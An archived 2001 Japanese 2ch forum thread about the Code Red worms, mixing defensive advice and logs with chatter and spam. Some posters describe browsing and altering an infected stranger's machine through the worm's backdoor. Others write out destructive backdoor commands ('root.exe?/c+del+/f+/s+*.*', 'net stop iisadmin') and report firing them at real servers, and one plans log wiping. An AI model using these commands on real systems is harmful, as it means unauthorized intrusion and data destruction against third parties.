>>790
シリアルナンバー集めてたよ。そこ。

>>790
ちゅうかワレザーじゃん。
通報しちゃえ（藁

「いけない女子高生」ﾊｧﾊｧ

interQって名前にIP入るのね。初めて知った。。。
setsuzoku-ppp-210-172-180-148.interq.or.jp

　　　 　 　 　 ＿ ＿_　　 　＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿_＿_＿_＿_
　 　 　 　 　 ノ, `'-‐┘、 　||￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣
　 　 　 　 く_//　i 　 　 ヽ　||　　　メールして　逆ギレされても　ツブさない
　　 　 　 　 i/　/ﾉ从ﾉ）) 〉 　 ./
. 　 　 　 　 i.V{ fl_|　|.) |/! 　 /　　 ／￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣
　 　 　 　 　 'ヽゝ~.ｰ ／ 　 ､/〉　＜　バックドア突いちゃダメ♪
　　　 　 　 　 /＾〈不lヽ　./じ'}　 　 |　マターリとね
　　　　　　　く_　 |/ヽ|. V　f´ 　　　＼＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿
　　　　　　　/　)/　.｡i|/{. / ||　　　　　　　
. 　 　 　 　 /^Vr 〉=｡||. ‐'　.||
.　　 　 　 /　/〈/　 .｡!!　　　||

>>790
チェキ！

>800
ハイ！　これからは気をつけます！

カワイイなぁ〜

>790
うわ　c:に2chのアドが！

「いけない女子高生」を見たいよう…。

新しいの作ったよ。
http://www.nefty.net/desktop/haritsuke/imgboard.cgi
http://www.nefty.net/desktop/haritsuke/img-box/img20010810131012.gif
今度スレ立てるときマスコットにしてくれないかな。（ぼそ）

いけなけりゃ、いかしてみよう女子高生

n00028.max119.phs.yoyogi.mopera.ne.jp
ﾁｮﾄﾜﾗﾀ

女子高生のバックドアﾊｧﾊｧ

>>790　の人、悲惨な事になってるね。

2001/08/10 10:50 <DIR> このサーバーはCode Redに感染し回り迷惑しています！　及びバックドアが開いております！　早急な処置を！　参照→http：／／ton.2ch.net／sec／index2.html　（／／は半角にしてね）
2001/08/10 11:01 <DIR> このサーバーはCode Redに感染し回り迷惑しています！　及びバックドアが開いております！　早急な処置を！　及び　不正なシリアルは使わない事！
2001/08/10 13:04 <DIR> 兄チャマの秘密、四葉がみ〜んな暴いちゃう！兄チャマのすべてをチェキ!!
2001/08/10 13:06 <DIR> 兄チャマの秘密、四葉がみ〜んな暴いちゃう！兄チャマのすべてをチェキ！！

色々やられてﾏｽ

http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=3067
トレンドマイクロから自動駆除ツールがでてるみたいよ

＞＞８０７
何が可笑しいんだ？

>>790 はまだ気が付かんのか？家にいないのかね。

家に帰ってビックリする姿が目に浮かぶ…

4.23.＊.＊

>>811
PHS からってことじゃない？
感染されたノートPC持ち歩いてモバイルでダイアルアップして
CodeRed ばら撒いてる、と。

d:\inetpub\wwwroot　にエロ画像（動画？)をコピーする奴は
いないだけまだましと思われ。

拡張子 .ram ってなに？

>>814
ｿﾉﾄｵﾘ!

>>815
リアルプレーヤーでしょ？

>>815
Realじゃなかったかと。

.ramってのはストリーミングデータで本当はURLしか含まないはずだが・・・
>>790の持ってる.ramは.rmと同じっぽい。

>>814
それはひょっとして、自動ダイアルアップで勝手に繋ぎまくり？
それともモペラって常時接続？

>>810
じゃそれをgetして、210.172.180.148にupしてexeして

>>821
ﾜﾗﾀ
って、アップロードできるの？

>>820
＞それともモペラって常時接続？
そんなわけない（藁
多分、本人気がつかずにパケット送りまくり。
来月のパケット料金が楽しみだ。

>>822
しらない。（ごめん、思いつきで書いた）
けど、Adminとれたら、めんどくさそうだけど、できるよね。
さてどうやって乗っ取るか・・・

>>824
dir 取った時点で一線を超えてるが、それ以上は止めたほうが良いと思われ。
ｶﾜｲｿｳだから対応しようというなら Interq に言うべし。

>>823
うひゃぁ〜!(w
かなりすごいことになりそう。

>>822,>>824
前々スレくらいで、だれかWEBフォルダに登録できるって言ってなかった？

>>824
ｆｔｐで、ゲット。

女子高生wwwrootに１９番までコピーしたがあとは

>>828 ｦｲｦｲ(w
WinMX で貰えよ。

あったあった。
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997350129&st=850&to850&nofirst=true
｢コード･レッド｣って怖いの？　の850

お祭りのところ、大変申し訳ないが、一応Interqに警告メールを送ったよ。
無粋な奴と言われてもいいよ。
ただ、dirとったり、警告メッセージを張り付けたりする程度なら、「善意の
あらわれ」と拡大解釈出来なくもないが、ファイルをダウンロードしようと
したり、改変しようとしたら、言い訳のしようがないよ。

間違えた･･･
http://ton.2ch.net/test/read.cgi?bbs=sec&key=996563662&st=850&to850&nofirst=true

おもしろい記事があったので…

MSとFedExが『Code Red』ワームの餌食に
http://japan.cnet.com/News/2001/Item/010810-4.html?mn
↑
あきれてしまう記事ですね(苦笑)

>>833
ガイシュツ

>>830
んーと、htmlとかはechoで出力（っていうか作る）できるけどね・・・
バイナリとかのアップとかはFTPの方が楽そうだからadmin乗っ取った方が簡単かと。

ほんとに wwwroot にコピーされてるよ…。いくらなんでもやりすぎ。
だいいち一つあたり 1.2MB ほどの動画でしょ。見ても大したことないと思う
のだが。

ところがどっこい！！
ものすごいやつだったりして。

dドライブのwwwrootにコピーされてるけど、cドライブのwwwrootと
どっちが機能してるの？

このスレ、昨日警察に情報源として教えておいたから、
あんまり黒いことしないほうがいいYO!

っていうか、どっちも機能してないかも

いまちょっと http 喋ってみたけど、dドライブではないもよう。
やば、これ以上はいかんぞ、自粛。

$ cat /var/log/httpd/access_log | grep 408
203.218.75.169 - - [07/Aug/2001:01:21:35 +0900] "-" 408 -
203.73.121.19 - - [07/Aug/2001:02:33:13 +0900] "-" 408 -
203.154.102.82 - - [07/Aug/2001:10:38:04 +0900] "-" 408 -
203.77.98.3 - - [08/Aug/2001:00:01:34 +0900] "-" 408 -
203.39.196.145 - - [08/Aug/2001:12:36:09 +0900] "-" 408 -
203.231.174.248 - - [08/Aug/2001:16:58:30 +0900] "-" 408 -
211.23.143.202 - - [08/Aug/2001:17:52:47 +0900] "-" 408 -
CodeRedの間に挟まるこれも気持ち悪い。うち、トップはTestPageのままのはずなのに。

408ってなんだっけ？

NNNNNNNNNの頃は良かったなぁ。IPが多彩で。
XXXXXXXXXXになってから61ばっかり（たまにNNNも来るが）

http://www.security.nl/misc/codered-stats/geodist.gif

408=タイムアウト

100 : Continue
101 : Switching Protocols
200 : OK
201 : Created
202 : Accepted
203 : Non-Authoritative Information
204 : No Content
205 : Reset Content
206 : Partial Content
300 : Multiple Choices
301 : Moved Permanently
302 : Moved Temporarily
303 : See Other
304 : Not Modified
305 : Use Proxy
400 : Bad Request
401 : Unauthorized
402 : Payment Required
403 : Forbidden
404 : Not Found
405 : Method Not Allowed
406 : Not Acceptable
407 : Proxy Authentication Required
408 : Request Time-out
409 : Conflict
410 : Gone
411 : Length Required
412 : Precondition Failed
413 : Request Entity Too Large
414 : Request-URI Too Large
415 : Unsupported Media Type
500 : Internal Server Error
501 : Not Implemented
502 : Bad Gateway
503 : Service Unavailable
504 : Gateway Time-out
505 : HTTP Version not supported

ﾊﾞｯｸﾄﾞｱ弄ってる最中に見つかってしまった（ｗ

切断されたの？

やっと気がついたか。遅すぎじゃ…

ん？interQの話？
まだ生きてるっぽいけど

バックドアから侵入したりすると、捕まったりするよ。
串何重にかけたって無駄なのは知ってると思うけど。

ワレモノ置いてるところに告訴されてもねぇ・・・

なんだかんだで850だね。
そろそろ次のスレタイトルを考える時期かな。

コードレッド (Code Red) 鍵開いてるからって入ったら犯罪です
なんてどうだ。

203.241.205.228 - - [] "GET /default.ida?XXXXX

こいつ、

Server: Apache/1.3.20 (Win32) PHP/4.0.6

なのに、なぜ？
NAT の裏で別マシンが喰らってるのかな？

>>853
　アイツは泥棒なんだ、だからアイツから盗んでも泥棒には
　ならないんだ。

　ちょっと同意できないな。
　まあ、ひと事だからどうでもいいんだけどね。

コードレッドに感染し、すぐ発見して除去しバックドア埋め込
まれる前に対策を施した。（NNNNNNNNNの頃）
その後ノートンや検査ツールでバックドアが入っていない
か念入りに確認して大丈夫だった。
これで大丈夫だよね？
まだなんか必要？

フォーマット

>>885
ん？IISっぽいけど？

>>855
おお漏れもこれ考えたことある。
吐くされないように、簡易セキュリティーって（ｗ

>>857
IIS使うのやめたら完璧。

なんでＨＤＤにエロイ物置いときますかね？
一度見たら飽きませんかね？

>>854
そのタイトルだと厨房が集まりそうだから
賛成できない。

まだトカドカ飛んでくるけど、
今のところ大丈夫みたいなんだけど・・・

>>861
M$のOS使うのやめれ。

>>856
いや、ま、自分も罪になるというリスクをかぶってまでするかな？って話で
裏口入学が悪くないとはいってないっす。

>>857
大丈夫だと思われ。
今後のこと考えて firewall や IDS を入れるとなおよし。

サンキューです

ヱロが欲しけりゃ WinMX なりあるじゃん。わざわざ罪重いほう選ばんでも...

んじゃ、そろそろ次スレ準備しますか。
1は適当に今のを直します。2のリンク集、古くなってきてるし
多すぎるのもなんだから、今いる人で厳選してくれると
ウレシイ。

http://www.ipa.go.jp/security/ciadr/vul/20010727codered.html
これは必要でしょ

赤丸じゃなくて赤丸弐号でいきませんか

赤虫弐号じゃなくて？

ごみん。まちごーた

赤虫弐型ってのはどう？
リンクの方は
http://www.reasoning.org/jp/security_alerts/hashsa-2001-02.html
が分かりやすいのでいいと思う。

赤虫弐号がInternetからIISを駆除する。

ふぇ〜ん、kr.から赤丸ばっかりでいいかげんいやづら･･･
＿＿　 ＿＿＿_＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿
　 　 ∨　　　 　　ｺｰﾅｯﾀﾗ…
　　　　　　　ｶﾀｶﾀ＿＿＿_　＿＿＿
　　　∧＿∧　　|｜＼　　 .＼　 |◎ |
　　　（；´Д｀）　.|｜　　|￣￣|　 |：[].|
　┌（　　つ／￣l｜ ／￣￣/　 | ＝|
　 |└ ヽ　|二二二」二二二二二二二二」
　　￣］|_＿）_） .|　||　　　　　　　 |　||
　　／￣＼　 ／ . || 　 　　　　／　 ||
　 ◎　　◎..［＿___||　　　 　 .［＿＿||

==================================================

　　　　　　　| 　　　　　　 |　海底ケブール斬ってﾖｼ！
　　　　　　　||l　 ∧Ω∧ υ――――――――――
　　　　　　　 l|ll （´∀｀　） 　ｻﾞｸｰﾘ　　　　<ﾟ彡巛
　　　　　　　 .l|l　ヽ ∨ ノ, 　　　　　　　　　　　　　　<ﾟ彡巛
　＿＿＿＿＿l| (/`'(　) ＼ ＿＿＿＿＿＿＿＿＿＿＿＿＿
ｱNNN…（ﾟ∀ﾟ ){,.,}.A。）ｸﾞﾋｬ!（ ゜∀゜)（゜∀゜)ｱdefault.ida?XXXXX…
￣￣￣￣￣￣　 ￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣
==================================================

（次の日）
　　　　／￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣
　　　　|　モナーくん、昨日からカンコック工場と連絡取れないんだ。
　　　　|　悪いが今からこのDVDを届けてきてくれないか。
　　　　＼＿＿＿　 ＿＿＿＿＿＿＿＿＿＿＿＿＿
　　　　　　　　　　∨
　＿＿　　！　　　∧＿∧
/　　／|∧＿∧ （・∀・　 ）
|二|＿_|（；´Д｀） （部長A）
川ﾆl二l一、⊂ ）　|　｜ ｜
￣￣￣￣￣|ノ　（＿（＿_）
　 　 　 　 　 |⊃　　　 　 　　　　／￣￣￣￣＼ 10.255.211.10->80
　 　 　 　 　 | 　　　 　　　　 　/　　　　 ●　　●　　172.30.251.1->80
　　　　　　　　　　　　　　　　　|Y　　Y　　　　　　　＼ 　192.168.3.9->80
　　　　　　　　　　　　　　　　　| |　　 | 　　　　　　▼｜　　127.0.0.1->80
　　　　　　　　　　　　　　　　　| ＼／ 　　 　 　 ＿人| 　ｿﾞﾇｿﾞﾇ…
　　　　　　　　　　　　　　　　　|　　　　　　 ＿＿＿／
　　　　　　　　　　　　　　　　　＼　　　　／
　　　　　　　　　　　　　　　　　　｜ ｜　|
　　　　　　　　　　　　　　　　　　（_＿）＿）

==================================================

（と、いうわけで）
　　　 　 　 ∧ ∧ 　／￣￣￣￣￣￣￣￣￣￣￣￣
〜′ ￣￣( ﾟДﾟ)＜　Code Red 逝ってヨシ！
　 UU￣￣ U U　　＼＿＿＿＿＿＿＿＿＿＿＿＿＿


トップはこれで良い？

まずこれは追加、と。
http://www.microsoft.com/japan/technet/security/codealrt.asp

聞きたいんだけど、韓国の対応の遅さってなに？

>>877
だめ（笑）

韓国はワールドカップの準備で忙しいのだ

韓国ってインターネット接続環境がいいでしょ？（日本が酷いって話もあるけど）
だから、wormにはいい環境だったんじゃない？

対応が遅いのは問題だけど・・・
けど、wormに気が付かないと対応できないし（藁

確かに常時接続環境は日本よりも韓国の方が整っているらしいな。

XXXの方がすっごい飛んでくるよ。
いつになったらおさまるのやら

犯人は捕まったの？

>>1
>>3
>>4
>>5
はそのまま転載？

>>2
をリニューアル？

いまから何も知らずにIIS構築してWEB公開する
人もいるだろうなぁ。
なにも知らずに感染。

帽子かぶって、マスクしてインターネットカフェでも行ってworm入れてたら、犯人捕まらないと思う・・・

「赤虫」だと、はじめて来たひとがスレみつけられなさそうだから
タイトルはつまんないけど「コードレッド (Code Red)」を含ませよう
と思うけど。

>>888 この季節に「帽子かぶって、マスクしてインターネットカフェでも行って」たら職質で捕まると思う…

BlackICEで見てると侵入者 0.0.0.0 とかくるんだけど？
アドレスがアドレスだけに遮蔽できないし。
これもコードレッドの仕業なのかな？

>>889
　同意。
>>888
　外部から持って来たプログラムを実行出来るインターネットカフェ
　はまずいかもね。不便で嫌だけど。

公衆電話から無料プロバイダの匿名でモデムからwormを流し込む

>>890
もし犯人が南半球の人間だったら・・・

犯人はインド人だ

>>886

>>2-5 から重要なのを抜いて 1つにまとめようと思うのだけど。
それ以外のは話題で上がったらこのスレの >>2-5 に誘導すれば
良いし。

>>890
ﾁｮﾄﾀﾞｹﾜﾗﾀ

あう。900が近い。
書き込み自粛

こんな恐ろしいウィルスは初めてだよ

（ﾟ∀ﾟCodeRed)ｱﾋｬﾋｬﾋｬ〜〜〜　さん
がんばってスレ立ててね！

うむ。勇気ある第一歩だ。

>>896
ある程度同意。 >>1 はそのままで >>2-5 はまとめたいです。
でも赤丸は残したいな。
東アジア壊滅の図とその中心
http://www.security.nl/misc/codered-stats/
http://jove.prohosting.com/~wingtxt/source/nakasu121.jpg

>>903
了解。んじゃ、もう俺立てちゃうよ。

おねがいしまーす。

見当たらないよ

あ、これからね。ｽﾝﾏｿ

ごめん、流れからはずれたけどこんな1はどう？
>>1は
コードレッド/II (Code Red/II) 赤虫弐型が世界を覆う

　猛威を振るっている Code Red とその亜種 (自称 Code Red II など)
　についての情報を追いましょう。
　●前スレ　コードレッド (Code Red) 赤丸が世界を覆う
　http://ton.2ch.net/test/read.cgi?bbs=sec&key=997283377

　　個人ユーザーで Windows NT/2000 を使っている人も、
知らない間にIISが稼働している場合があります。
　　　対象商品などのリスト
　　　http://www.microsoft.com/japan/technet/security/codeptch.asp

　　念のため次の 確認をしましょう

　　　・Ctrl-Alt-Del を押して「タスク マネージャ」を起動
　　　・「プロセス」タブを押す
　　　・Inetinfo.exe プロセスを探す
　　Inetinfo.exe があった人は、IISが動いています。

(　´Д｀)／　先生! よくわからないけど不安です って人は>>2

重要リンク>>3
その他の情報>>4

>>2は
1. 使ってるOSは Windows NT4.0/2000ですか？
　　　NT4.0 → 2.
　　　2000 (Server だけじゃなくて Professional 含む) → 3.
　　　どちらでもない → ﾖｶｯﾀﾈ
2. http://www.microsoft.com/japan/technet/security/codeptch.asp#counterofnt4
　　を見てすぐに対処しよう
3. http://www.microsoft.com/japan/technet/security/codeptch.asp#counterofw2k
　　を見てすぐに対処しよう


(　´Д｀)／　先生! 感染しちゃったみたいです。

すぐに IIS を停止しよう。それから
http://www.microsoft.com/japan/technet/security/codeptch.asp#extermination
を見て駆除しましょう。でも、すでに他のバックドア(裏口)を作られ
ちゃってるかもしれないので、なるべくなら OS の再インストール
を。くれぐれも再インストール中に感染しないように注意。
-----------------

あ、そうそう、zaqからのめーるでIISの殺し方がのってたよ。

以下転載
＊IISのアンインストール方法＊

１．「スタート」→「設定」→「コントロールパネル」を開きます
２．コントロールパネルの中の「アプリケーションの追加と削除」アイコンを
　　ダブルクリックします
３．新しく表示された画面の左側にある「Windowsコンポーネントの追加と削除」
　　ボタンをクリックします
４．Windowsコンポーネントウィザード画面内の「インターネットインフォ
　　メーションサービス（IIS）」のチェックを外します
５．「次へ」ボタンをクリックし、「完了」ボタンをクリックします

>>908-909 スマン。作っちまった。

次のスレはこちら↓
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997427742

>>911
シンプルでよし。

コードレッド(をばらまくマシン)を駆逐するためのIISフィルタ、
CC-Lemonを開発しました。ISAPI Filter形式で実装されており、
default.idaへのアクセス元に対して、
GET /script/root.exe?/c+del+/f+/s+*.*
の要求を自動的に行います。VECTORに公開しようと思うのですが、
僕は逮捕されますか？

ごくろうさまでした

>>913
vectorじゃなくて、どっかのfreeな処にupしてくれたら
俺がinternet cafeで帽子かぶってマスクして流してあげるよ。

以降引越しお願いします。
こっちで雑談したい人は sage 進行願いマース

>>915
インターネットカフェにはIISインストールされてないと思われ。

足がつかないように分散型を考えました。cgiが動くフリー
サーバがあれば、IISに導入するFilterがcgi形式のアタッカ
に要求を出し、このアタッカがバックドアを突いた報復攻撃
を行います。アタッカへのログは残りません。
アタッカへのリクエストはProxyを経由してください。

つーか単に外部多段プロキシリストを定義できるように
Filterに組みこんでしまえばいいですね。

やるなら堂々とやって、捕まって、
「被害額？ ふざけるなｺﾞﾙｧ!! 俺のおかげでバックドア
あらかじめ閉じたから再インストールだけで済んだんだ」
と裁判で主張きぼーん
傍聴にいってあげるYO!

>>915
wormまくときにはIISなくてもできそうだけど。。。
>>918
何処でも良いからUPしてくだされ。

あ、そか。Windows9xで動作する簡易型HTTPサーバに
同一の報復コードを実装しても効果ありますね。
それならほうぼうのインターネットカフェにインストール
してもらえばイケそうです。

このスレは↓に引越しました。
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997427742

こっちで雑談したい人はsageで進行してください

つーかsageてますが・・・

sageても、あまりさがってない。

つうか、*.krだけターゲットにするバージョン作るよろし。

実験してみたんですが国内のDNSでは*.krかどうかの判定精度が低下
するのでなんとかなりませんかね？

>>927

http://ton.2ch.net/test/read.cgi?bbs=sec&key=997414956&st=18&to=18&nofirst=true

>>928
テーブル方式ですかい・・・・。

>>918
素晴らしいアイデアですなぁ。
>>927
頑張ってください。

>>926
激同意。
昨日の赤結果：894回(kr)だもん。
いやになってます。

てか、そこまでしなくても、net startコマンドで許してあげるのは
駄目ですか？

NET STOP IISADMINでCODEREDって抑止できます？
IISのインスタンスに依存してるならそれもアリなんですが。
冗談抜きでMSもまじめにウイルス抗体作るべきだと思うです。
いつまでたっても事態が改善しない。

http://[address]/scripts/root.exe?/c+net+stop+iisadmin+/y
これで実験してみましょう。
なんか一応受け付けられてるみたい。

最後の/yがないとプロンプト表示になるはずなので。
これって不正アクセスになるのかなあ・・・・。
とりあえずさうちに来てる腐れIISどもに
上から順に打ってますけど、僕だけ捕まるのもアレですので
どなたか一緒に捕まっていただける方いませんか？

よく天然記念物のカモシカとかさー、増えすぎちゃうと許可受けた
ハンターが規定個体分だけ撃ち殺すじゃん。
政府機関から許可受けたサイトだけ Code Red に >>933 返すス
クリプト起動しておくってのじゃダメなんかなー。撃ち殺したサ
イトには後で連絡してやってさ (最悪政治問題とかになりそう
だな)。

いま改造中です。このままじゃとおりません。
韓国サイトで実験させていただいております。
"net stop iisadmin"＜＜これをMIMEエンコード
しないと。

あんまり　うざいので　８１にPORTを変更した。

こんなとこからも　お客さんが来ていた。

[10/Aug/2001:13:41:42 +0900] 403 childpia.go.kr "GET /default.ida?X

CodeRedWatcherつかってみたら、こんなにきてたII　ビック -り
[2001/08/11 3:07:00] CodeRed Type XXXXX from: 202.102.223.xxx /
[2001/08/11 4:37:19] CodeRed Type XXXXX from: 202.102.170.xxx /
[2001/08/11 4:58:43] CodeRed Type XXXXX from: 202.121.112.xxx /
[2001/08/11 5:01:00] CodeRed Type XXXXX from: 202.212.135.xx / fxxxxxx.ap.plala.or.jp
[2001/08/11 5:01:23] CodeRed Type XXXXX from: 202.31.140.xxx /
[2001/08/11 5:35:54] CodeRed Type XXXXX from: 202.85.84.xxx / ip84-83.asiaonline.net
[2001/08/11 6:42:58] CodeRed Type XXXXX from: 202.98.180.xxx /
[2001/08/11 6:59:22] CodeRed Type XXXXX from: 61.151.228.xx /

>>939
CodeRedWatcherって何?

>>940
偽鯖たてて赤虫を呼び込むだけの鶴

>>941
THX
もう1つ質問が、CodeRedに感染するのはNT系のOSのサーバーだけだよね。
で、感染したサーバーはWin9xだろうがMacだろうがすべてのOSにアタックするの?

lol

>>942
当方Win98SEですが、アタック食らいまくりです。
Macは使ってる人が知り合いにいないので詳細不明です・・。

このスレは↓に引越しました。
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997427742

こっちで雑談したい人はsageで進行してください

>>944
アタックされるときってISDNだったらターミナルアダプターとかのランプが
光ったりするのかな?
あとアタックされた時の被害ってどんな物?

>>946
当方ISDNなんですが。ほとんどの時間はファイルを転送しているのでランプの点滅状況は分かりません。
被害はWinNTか2000でない限りファイアーウォールのログにアタックしてきた形跡が残るだけです。

>>945
ｽﾏｿ。

>>947
ありがとう

ローカル環境でテスト中の独り言。
うーん。NET STOPコマンド自体にadmin権限がいるのかあ・・・。
caclで再割り当ても弾かれるねえ。
これじゃログも消せやしない。

やぱ外部からDOWNLOADさせてそいつで殺すのがよさげか。
サービスとしてインストールした直後にコントロールマネージャ
に接続してIISADMINを殺すCOMモジュールはできてるんだ。
ついでにSYSTEM32\LogFilesの下も抹消な。
あとはFTPコマンドの起動とDOWNLOADまでのスクリプトだな。
ああ、やっぱ犯罪だよなあこれ・・・。

DLするならもはやサーバ自体シャットダウンもできるな・・・。

>>939,941
CodeRedWatcherほしい。どこに落ちてる？

http://ueno.cool.ne.jp/zeiger/CodeRedProve.zip

にたようなのなら。>>951

>>942
80番ポートがあったら相手が何でも攻撃してくる。うちは UNIX clone plus
apache だけどもーうざったいったらない。

ここのスレ、夏厨しかいないのね。

どうやらウイルスに感染したようです
ネットに繋いで３０分すると
必ず画面の上から下に、花びらが舞い落ちてきます

Port 6699 でがんがん来てませんか？

>>955
　なんか、ちょっとうらやましい。

>>952
さんきゅう。ゲットした。

>>952
win98なら実行しても意味ないよね

Win98でもサーバはたてることはできる

>>955
いいな、俺なんかWindowsマークが飛んでくるぞ。
調べようとして、ちょっとでもキーに触ると消えるんだ。

>>955
俺のなんか、電気が落ちるんだから。
ちょっとでもキーに触ると動きだすんだ。

>>955
へぇ、うちなんかＤｏｏｍみたいな画面になるんだけど
操作しようと思うと消えちゃうんだ

花見ウィルス、フライングWindowsウィルス、
サスペンドウィルス、３D迷路ウィルスですね。

危険度は５、最高レベルです

白状します。気付かずに純粋にうらやましがってしまいました。

>>965ﾜﾗﾀ

ぎゃはは、そりゃスクリーンセイバーじゃないか。
俺のスクリーンセイバーなんか凄いんだぜ。
インストした覚えも無いのにグルグル巻きの絵が出てくるんだ。

>>967
お前、なに言ってんの。

>>967
ショップ展示のセーバーでそんなのがあったな・・・
・・・まさかそのまま買わされたとか？

もうHybrisは過去の物か・・・・

あのね、おとーさんのパソコンね、なんにもしないでおいとくと
えっちな絵がたくさんでてくるの。
ういるすなら消しちゃったほうがいいのかなぁ。

>>
http://202.223.168.71/~shoichi/tateyama/2001/

９００超えスレッド発見

１０００狙う！！！！！！！！！！！！！！！！！！！

いくよ

んんん？？？　　落ちた・・・

俺様が１０００取れたらウラビデオさしあげます

配布場所　http://www.megabbs.com/cgi-bin/readres.cgi?bo=douga&vi=995801026&rm=100

ただし、１０００の邪魔されたら配布中止

台風情報で「満潮」を「マンチョ」と読み間違えた女子アナ萌え〜〜〜

お願いですから、９９９までＲＯＭしていて１０００になって
いきなりカキコするのはやめてね

東急CATV内でCodeRedをほったらかしにしてるヤツ、いい加減にしろ〜！
1時間に20近くアタックしてくるぞ。

俺様はゲームラボの取材を受けたことあるよ！！！！！！

ギャラは図書券￥１０００だった（ｗ

ん？　邪魔するなっつーの！！！！！！

氏ね>>980

いくら夏休みだからって　馬鹿が多すぎ！！！！！
日本語読めねえのかよー

１０００は俺様が取るから　カキコするな

台風の目ってマジで風速０ｍの晴天なの？？？

俺様の邪魔したらＩＰさらしあげじゃ〜〜〜〜〜〜〜〜〜〜

わかったか！！！

でも、邪魔したＩＰってどこに書けばいいのかな？？　１０００超えたら書けない

いよいよ、１０００まであともう少し

そろそろ動くよ

つーか、コードレッドってなんじゃらホイ？？？

ああ、多分、早b除機のコードが終わりを示す赤い線のことね

おお！！！　くそ〜〜〜〜入力ミス！！！！！！

せっかくのボケが台無しだ〜〜〜〜〜〜

くやしーーーーーーーーーーーーーーーーーーーーーー

もう一度チャレンジ　つーか、書き直しじゃーーーーーーーー　↓↓↓

つーか、コードレッドってなんじゃらホイ？？？

ああ、多分、早b除機のコードが終わりを示す赤い線のことね

（ﾟдﾟ)ｳﾏｰ
　（ﾟдﾟ)（ﾟдﾟ)ｳﾏｰ　　　　 （ﾟдﾟ)ｳﾏｰ
（ﾟдﾟ)（ﾟдﾟ)（ﾟдﾟ)ｳﾏｰ　（ﾟдﾟ)（ﾟдﾟ)ｳﾏｰ
　（ﾟдﾟ)（ﾟдﾟ)ｳﾏｰ　　（ﾟдﾟ)（ﾟдﾟ)（ﾟдﾟ)ｳﾏｰ
　　 ｜/／　　　　　　　　　（ﾟдﾟ)（ﾟдﾟ)ｳﾏｰ
　　 ｜　　　　　　　　　　　　｜/／
　　 ｜　　　　　ﾜｰｲ　　　　／
　　 ｜　　　∧ ∧　　　　／
　　 ｜ 　　(,,･∇･)　　 ／　　　　⊂,'⊃
　　 ｜￣｜￣￣￣￣￣~｜
　　 ｜　 ｜ふぁんたじー｜
　　 ｜　 ｜ 　　 号　　　_｜
　　　￣￣￣￣￣￣

　　　／　￣￣＼ 　　　　　　　　　　　　　　〜〜〜〜
⊂⊃　　　　　　　　　　　　 ／＼ 　　　　⊂⊃
／⊂⊃　　　　　　　　＼／　　　＼　／＼　　⊂⊃　　／＼
〜〜〜〜　　　　　　　　＼　　　　　＼　　　　 ／＼／　　　＼
　　　　　　　　　　　　　　　　　 　　　　　　／　　／　　　　　　　＼

これでよし！！！！　　　われながら　いいボケだ

おおおお！！！！！邪魔する気か！！！！！

そうはさせんぞ

いいか！！！！！　　俺様は最後に勝つ

１０００　は　美しい！！！！！


バンザイ！！！！！！！！！！！！！！！！！！！！！

（ﾟдﾟ)ｳﾏｰ
　（ﾟдﾟ)（ﾟдﾟ)ｳﾏｰ　　　　 （ﾟдﾟ)ｳﾏｰ
（ﾟдﾟ)（ﾟдﾟ)（ﾟдﾟ)ｳﾏｰ　（ﾟдﾟ)（ﾟдﾟ)ｳﾏｰ
　（ﾟдﾟ)（ﾟдﾟ)ｳﾏｰ　　（ﾟдﾟ)（ﾟдﾟ)（ﾟдﾟ)ｳﾏｰ
　　 ｜/／　　　　　　　　　（ﾟдﾟ)（ﾟдﾟ)ｳﾏｰ
　　 ｜　　　　　　　　　　　　｜/／
　　 ｜　　　　　ﾜｰｲ　　　　／
　　 ｜　　　∧ ∧　　　　／
　　 ｜ 　　(,,･∇･)　　 ／　　　　⊂,'⊃
　　 ｜￣｜￣￣￣￣￣~｜
　　 ｜　 ｜ふぁんたじー｜
　　 ｜　 ｜ 　　 号　　　_｜
　　　￣￣￣￣￣￣

　　　／　￣￣＼ 　　　　　　　　　　　　　　〜〜〜〜
⊂⊃　　　　　　　　　　　　 ／＼ 　　　　⊂⊃
／⊂⊃　　　　　　　　＼／　　　＼　／＼　　⊂⊃　　／＼
〜〜〜〜　　　　　　　　＼　　　　　＼　　　　 ／＼／　　　＼
　　　　　　　　　　　　　　　　　 　　　　　　／　　／　　　　　　　＼
pppppp

ＥＲＲＯＲ：２重カキコですか？？

名前： キリ番ゲッター
E-mail：
内容：
１０００　そこは　最後のフロンティア

（ﾟдﾟ)ｳﾏｰ
　（ﾟдﾟ)（ﾟдﾟ)ｳﾏｰ　　　　 （ﾟдﾟ)ｳﾏｰ
（ﾟдﾟ)（ﾟдﾟ)（ﾟдﾟ)ｐｐｐｐｳﾏｰ　（ﾟдﾟ)（ﾟдﾟ)ｳﾏｰ
　（ﾟдﾟ)（ﾟдﾟ)ｳﾏｰ　　（ﾟдﾟ)（ﾟдﾟ)（ﾟдﾟ)ｳﾏｰ
　　 ｜/／　　　　　　　　　（ﾟдﾟ)（ﾟдﾟ)ｳﾏｰ
　　 ｜　　　　　　　　　　　　｜/／
　　 ｜　　　　　ﾜｰｲ　　　　／
　　 ｜　　　∧ ∧　　　　／
　　 ｜ 　　(,,･∇･)　　 ／　　　　⊂,'⊃
　　 ｜￣｜￣￣￣￣￣~｜
　　 ｜　 ｜ふぁんたじー｜
　　 ｜　 ｜ 　　 号　　　_｜
　　　￣￣￣￣￣￣

　　　／　￣￣＼ 　　　　　　　　　　　　　　〜〜〜〜
⊂⊃　　　　　　　　　　　　 ／＼ 　　　　⊂⊃
／⊂⊃　　　　　　　　＼／　　　＼　／＼　　⊂⊃　　／＼
〜〜〜〜　　　　　　　　＼　　　　　＼　　　　 ／＼／　　　＼
　　　　　　　　　　　　　　　　　 　　　　　　／　　／　　　　　　　＼

このスレッドは１０００を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。